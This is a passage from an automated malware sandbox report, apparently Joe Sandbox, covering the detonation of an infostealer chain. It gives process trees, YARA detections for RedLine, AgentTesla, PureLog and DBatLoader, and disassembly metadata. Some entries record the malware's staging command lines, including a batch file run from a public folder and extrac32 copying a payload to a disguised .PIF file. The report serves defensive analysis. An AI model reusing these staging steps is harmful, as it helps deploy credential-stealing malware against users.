                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 58%, ReversingLabs
                                                                                                                          • Detection: 38%, Virustotal, Browse
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                                                                                                                          Imagebase:0x410000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:08:24:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                                                                                                                          Imagebase:0x860000
                                                                                                                          File size:29'184 bytes
                                                                                                                          MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:08:24:31
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:08:24:43
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\Ucvuiswb.PIF
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\Public\Libraries\Ucvuiswb.PIF"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 58%, ReversingLabs
                                                                                                                          • Detection: 38%, Virustotal, Browse
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:08:24:44
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:08:24:52
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\Ucvuiswb.PIF
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\Public\Libraries\Ucvuiswb.PIF"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:08:24:52
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\Public\Libraries\bwsiuvcU.pif
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:68'096 bytes
                                                                                                                          MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Executed Functions

                                                                                                                            Function 000001A2C9890FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000003.1852666137.000001A2C9890000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A2C9890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_3_1a2c9890000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction ID: 6dc7fd48f8446e16a7e5d89954fb4c117199bebb7c4251f65feee9c5b4017f3c
                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction Fuzzy Hash: AE90021669640A99D41415950C4929C5040638A260FD545808416D1588D55E03969153
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 000001A2C9890FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000003.1852666137.000001A2C9890000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A2C9890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_3_1a2c9890000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction ID: 6dc7fd48f8446e16a7e5d89954fb4c117199bebb7c4251f65feee9c5b4017f3c
                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction Fuzzy Hash: AE90021669640A99D41415950C4929C5040638A260FD545808416D1588D55E03969153
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 000001A2C9890FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000003.1852666137.000001A2C9890000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A2C9890000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_3_1a2c9890000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction ID: 6dc7fd48f8446e16a7e5d89954fb4c117199bebb7c4251f65feee9c5b4017f3c
                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                            • Instruction Fuzzy Hash: AE90021669640A99D41415950C4929C5040638A260FD545808416D1588D55E03969153
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFAAB973AC5 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1842530535.00007FFAAB970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB970000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab970000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                            • Instruction ID: d7434119911d04e4a5d63ac17dbcb90a0276d598b915e76db3fee3f6dc63f9da
                                                                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                            • Instruction Fuzzy Hash: 1801677111CB0C8FD748EF0CE451AA5B7E0FB95364F50056DE58AC3665D736E882CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFAAB970E65 Relevance: .4, Instructions: 402COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1842530535.00007FFAAB970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB970000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab970000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8e702702e75f2618a7229afc80279f3a01cb86a5e902ecab81c9189c016ce96
                                                                                                                            • Instruction ID: 3ef24b2f02e88eea17b49cec496d10bfb5264e98f42d42dd33281edb7588c803
                                                                                                                            • Opcode Fuzzy Hash: d8e702702e75f2618a7229afc80279f3a01cb86a5e902ecab81c9189c016ce96
                                                                                                                            • Instruction Fuzzy Hash: 8DC1F69790FAD7DBE31357685C6A4E97F90EF5329470981F7D4C84F0A3EE18288A82D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 14071 7ffaab95c809 14072 7ffaab95c80f CreateFileW 14071->14072 14074 7ffaab95c8de 14072->14074

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFAABA2362E Relevance: .7, Instructions: 655COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: acd416ace24d9dfbcbb39d8b55867f254fa05b93f3d578d471675dd7cb902d4d
                                                                                                                            • Instruction ID: 75b816a46a49c29a0014a4b0acb36581efd717699a4a25161ee887d250f359ce
                                                                                                                            • Opcode Fuzzy Hash: acd416ace24d9dfbcbb39d8b55867f254fa05b93f3d578d471675dd7cb902d4d
                                                                                                                            • Instruction Fuzzy Hash: D4121672A1EBCA4FE7A6976848656757FE1EF47250B1840FFD08DC70B3E9289809C391
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA226C1 Relevance: 5.2, Strings: 4, Instructions: 207COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 567 7ffaaba226c1-7ffaaba22734 570 7ffaaba2273a-7ffaaba2274f 567->570 571 7ffaaba22821-7ffaaba2282b 567->571 570->571 575 7ffaaba22755-7ffaaba22762 570->575 573 7ffaaba2282d-7ffaaba22837 571->573 574 7ffaaba22838-7ffaaba2287a 571->574 579 7ffaaba22764-7ffaaba22775 575->579 580 7ffaaba22776-7ffaaba227fe 575->580 579->580 594 7ffaaba22806-7ffaaba2281e 580->594 594->571
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8hz$8hz$8hz$8hz
                                                                                                                            • API String ID: 0-2997940489
                                                                                                                            • Opcode ID: 59c1dc39494a68be092f2d3aa02ce2ce28b5de97b9c9a3a2645848f6dc3bb547
                                                                                                                            • Instruction ID: a63b4e371f7ef3bf1efb0c7b54425acb06ed7c9c81c09e1aa7f0f2c8df443fc7
                                                                                                                            • Opcode Fuzzy Hash: 59c1dc39494a68be092f2d3aa02ce2ce28b5de97b9c9a3a2645848f6dc3bb547
                                                                                                                            • Instruction Fuzzy Hash: D451F562A1FBC64FE3A6876858651647FE1DF57290B1981FBD08EC71B3E8099C09C3D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAAB95C6F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 596 7ffaab95c6f9-7ffaab95c750 call 7ffaab9545d0 600 7ffaab95c781-7ffaab95c7ad 596->600 601 7ffaab95c752-7ffaab95c75b 596->601 607 7ffaab95c7b2-7ffaab95c7b5 600->607 601->600 608 7ffaab95c7b7 607->608 609 7ffaab95c812-7ffaab95c873 607->609 610 7ffaab95c7b9-7ffaab95c7c1 608->610 611 7ffaab95c7c2-7ffaab95c7d5 608->611 618 7ffaab95c87d-7ffaab95c8dc CreateFileW 609->618 619 7ffaab95c875-7ffaab95c87a 609->619 610->611 611->607 615 7ffaab95c7d7-7ffaab95c80f 611->615 615->609 620 7ffaab95c8de 618->620 621 7ffaab95c8e4-7ffaab95c90c 618->621 619->618 620->621
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1648332400.00007FFAAB950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaab950000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p[z
                                                                                                                            • API String ID: 0-2258540297
                                                                                                                            • Opcode ID: dbfc7a78e8e6728957da550923d0b1b8d1493cc15acc39d406e7d652d2515623
                                                                                                                            • Instruction ID: 703057e5b7440af174495da7e8f1fe61370270671b2f7007128371025ffed046
                                                                                                                            • Opcode Fuzzy Hash: dbfc7a78e8e6728957da550923d0b1b8d1493cc15acc39d406e7d652d2515623
                                                                                                                            • Instruction Fuzzy Hash: CE61F67190DA488FD758DB6C985A6B97BE0FF59350F04427FE04DD32A2DF24A80687C1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA2B044 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 695 7ffaaba2b044-7ffaaba2b058 696 7ffaaba2b05a-7ffaaba2b064 695->696 697 7ffaaba2b068 695->697 698 7ffaaba2b084-7ffaaba2b090 696->698 699 7ffaaba2b066 696->699 700 7ffaaba2b06d-7ffaaba2b07a 697->700 702 7ffaaba2b0de-7ffaaba2b135 698->702 703 7ffaaba2b092-7ffaaba2b0a2 698->703 699->700 700->698 707 7ffaaba2b07c-7ffaaba2b082 700->707 717 7ffaaba2b155-7ffaaba2b156 702->717 718 7ffaaba2b137-7ffaaba2b153 702->718 703->697 705 7ffaaba2b0a4-7ffaaba2b0ae 703->705 708 7ffaaba2b0b0-7ffaaba2b0c5 705->708 709 7ffaaba2b0c7-7ffaaba2b0dd 705->709 707->698 708->709 709->702 720 7ffaaba2b15e-7ffaaba2b16a 717->720 718->717 722 7ffaaba2b16c-7ffaaba2b170 720->722 723 7ffaaba2b172-7ffaaba2b177 720->723 724 7ffaaba2b178-7ffaaba2b182 722->724 723->724
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6x$r6x
                                                                                                                            • API String ID: 0-3369949480
